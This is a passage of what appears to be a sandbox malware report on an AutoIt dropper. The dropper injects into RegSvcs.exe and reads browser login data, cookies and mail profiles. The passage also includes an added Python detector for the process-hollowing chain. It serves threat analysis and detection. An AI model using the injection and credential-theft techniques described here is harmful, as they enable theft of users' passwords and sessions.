                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
                    Source: RegSvcs.exe, 0000000D.00000002.3687808007.000000000096B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllame=W
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
                    Source: wscript.exe, 0000000B.00000002.1384494835.0000020122A49000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
                    Source: RegSvcs.exe, 00000003.00000002.3686584741.00000000008C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
                    Source: name.exe, 0000000C.00000002.1396296883.0000000000927000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#`R
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
                    Source: C:\Users\user\Desktop\z1newpo.exe	API call chain: ExitProcess graph end node graph_0-86659
                    Source: C:\Users\user\AppData\Local\directory\name.exe	API call chain: ExitProcess graph end node
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06039548 LdrInitializeThunk,3_2_06039548
                    Source: C:\Users\user\Desktop\z1newpo.exe	Code function: 0_2_0045A370 BlockInput,0_2_0045A370
                    Source: C:\Users\user\Desktop\z1newpo.exe	Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                    Source: C:\Users\user\Desktop\z1newpo.exe	Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                    Source: C:\Users\user\Desktop\z1newpo.exe	Code function: 0_2_0426D500 mov eax, dword ptr fs:[00000030h] 0_2_0426D500
                    Source: C:\Users\user\Desktop\z1newpo.exe	Code function: 0_2_0426D560 mov eax, dword ptr fs:[00000030h] 0_2_0426D560
                    Source: C:\Users\user\Desktop\z1newpo.exe	Code function: 0_2_0426BEC0 mov eax, dword ptr fs:[00000030h] 0_2_0426BEC0
                    Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0411F4C0 mov eax, dword ptr fs:[00000030h] 2_2_0411F4C0
                    Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0411F520 mov eax, dword ptr fs:[00000030h] 2_2_0411F520
                    Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0411DE80 mov eax, dword ptr fs:[00000030h] 2_2_0411DE80
                    Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 12_2_041D82D8 mov eax, dword ptr fs:[00000030h] 12_2_041D82D8
                    Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 12_2_041D9918 mov eax, dword ptr fs:[00000030h] 12_2_041D9918
                    Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 12_2_041D9978 mov eax, dword ptr fs:[00000030h] 12_2_041D9978
                    Source: C:\Users\user\Desktop\z1newpo.exe	Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
                    Source: C:\Users\user\Desktop\z1newpo.exe	Code function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
                    Source: C:\Users\user\Desktop\z1newpo.exe	Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
                    Source: C:\Users\user\Desktop\z1newpo.exe	Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA
                    Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0041F250 SetUnhandledExceptionFilter,2_2_0041F250
                    Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041A208
                    Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00417DAA
                    Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 12_2_0041F250 SetUnhandledExceptionFilter,12_2_0041F250
                    Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 12_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0041A208
                    Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 12_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00417DAA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                    Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                    Source: C:\Users\user\AppData\Local\directory\name.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 485008
                    Source: C:\Users\user\AppData\Local\directory\name.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 499008
                    Source: C:\Users\user\Desktop\z1newpo.exe	Code function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
                    Source: C:\Users\user\Desktop\z1newpo.exe	Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                    Source: C:\Users\user\Desktop\z1newpo.exe	Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                    Source: C:\Users\user\Desktop\z1newpo.exe	Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
                    Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\z1newpo.exe"
                    Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
                    Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
                    Source: C:\Users\user\Desktop\z1newpo.exe	Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
                    Source: name.exe	Binary or memory string: Shell_TrayWnd
                    Source: z1newpo.exe, name.exe.0.drBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                    Source: C:\Users\user\Desktop\z1newpo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
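The "Process created" lines in this section are the most useful hunting artefact on the page: RegSvcs.exe, a signed .NET framework utility, is started by name.exe with the dropper's own path ("C:\Users\user\Desktop\z1newpo.exe", later "C:\Users\user\AppData\Local\directory\name.exe") as its command line, while the surrounding lines show name.exe writing into RegSvcs.exe and loading sections with execute/read/write protection. A process whose command line names a different executable than its image is the residue of this kind of injection, and it is visible in ordinary process-creation telemetry without any memory inspection. The check below is an added example, not part of the Joe Sandbox report: the event dicts are constructed in the shape of Sysmon Event ID 1 fields (Image, CommandLine, ParentImage) with values copied from the report's process lines plus one constructed benign control row, and the list of user-writable directories and of .NET utilities to watch is an assumption to be tuned per environment.

```python
"""Process-creation checks for the hollowing chain in this report.

Added example (not part of the Joe Sandbox report): the events below are
constructed in the shape of Sysmon Event ID 1 fields, with values copied from
the report's "Process created" lines plus one benign control row.
"""
import ntpath
import re

# Directories an unprivileged user can write to (assumed list); a parent living
# here is suspicious when it spawns a signed .NET framework utility.
USER_WRITABLE = re.compile(
    r"^[A-Za-z]:\\Users\\[^\\]+\\(AppData|Desktop|Downloads|Documents)\\", re.I)

# .NET utilities commonly used as injection targets (RegSvcs.exe is the one seen here).
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Constructed events modelled on the report's process tree.
EVENTS = [
    {"Image": r"C:\Users\user\Desktop\z1newpo.exe",
     "CommandLine": r'"C:\Users\user\Desktop\z1newpo.exe"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Users\user\AppData\Local\directory\name.exe",
     "CommandLine": r'"C:\Users\user\AppData\Local\directory\name.exe"',
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "CommandLine": r'"C:\Users\user\Desktop\z1newpo.exe"',
     "ParentImage": r"C:\Users\user\AppData\Local\directory\name.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "CommandLine": r'"C:\Users\user\AppData\Local\directory\name.exe"',
     "ParentImage": r"C:\Users\user\AppData\Local\directory\name.exe"},
    # Benign control (constructed): RegSvcs.exe run by an installer with its own path.
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" C:\app\Svc.dll',
     "ParentImage": r"C:\Windows\System32\msiexec.exe"},
]


def first_token(cmdline: str) -> str:
    """Return the executable named by a Windows command line (handles the quoted form)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end != -1 else cmdline[1:]
    return cmdline.split(None, 1)[0] if cmdline else ""


def command_line_mismatch(event: dict) -> bool:
    """True when the command line names a different .exe than the process image.

    An injected RegSvcs.exe keeps the command line its parent passed at
    creation, which here is the dropper's own path rather than RegSvcs.exe.
    """
    named = first_token(event["CommandLine"])
    return (named.lower().endswith(".exe")
            and ntpath.normcase(named) != ntpath.normcase(event["Image"]))


def in_user_writable(path: str) -> bool:
    return bool(USER_WRITABLE.match(path))


def classify(event: dict) -> list:
    """Return the list of rule names the event trips (empty for benign events)."""
    findings = []
    image = ntpath.basename(event["Image"]).lower()
    parent = ntpath.basename(event["ParentImage"]).lower()
    if command_line_mismatch(event):
        findings.append("cmdline_image_mismatch")
    if image in DOTNET_HOSTS and in_user_writable(event["ParentImage"]):
        findings.append("dotnet_utility_from_user_writable_parent")
    if parent in SCRIPT_HOSTS and in_user_writable(event["Image"]):
        findings.append("script_host_spawned_user_writable_exe")
    return findings


def scan(events: list) -> dict:
    """Map event index -> findings for every event that trips at least one rule."""
    return {i: f for i, e in enumerate(events) if (f := classify(e))}


if __name__ == "__main__":
    for idx, hits in scan(EVENTS).items():
        print(idx, ntpath.basename(EVENTS[idx]["Image"]), hits)
```

The mismatch rule on its own is noisy in environments that launch binaries through 8.3 short names, symlinks or launchers, so it is paired with the parent-location rule; both RegSvcs.exe rows from the report trip both rules, the wscript.exe-spawned name.exe trips only the script-host rule, and the constructed installer row trips nothing.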

Stealing of Sensitive Information

Source: Yara match | File source: 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3688609885.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.name.exe.12d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.name.exe.ba0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.name.exe.ba0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.name.exe.12d0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: name.exe PID: 788, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3636, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: name.exe PID: 6540, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6480, type: MEMORYSTR
Source: Yara match | File source: 3.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.name.exe.12d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.name.exe.ba0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.name.exe.ba0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.name.exe.12d0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3688609885.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.3689181352.0000000002823000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: name.exe PID: 788, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3636, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: name.exe PID: 6540, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: name.exe | Binary or memory string: WIN_XP
Source: name.exe.0.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 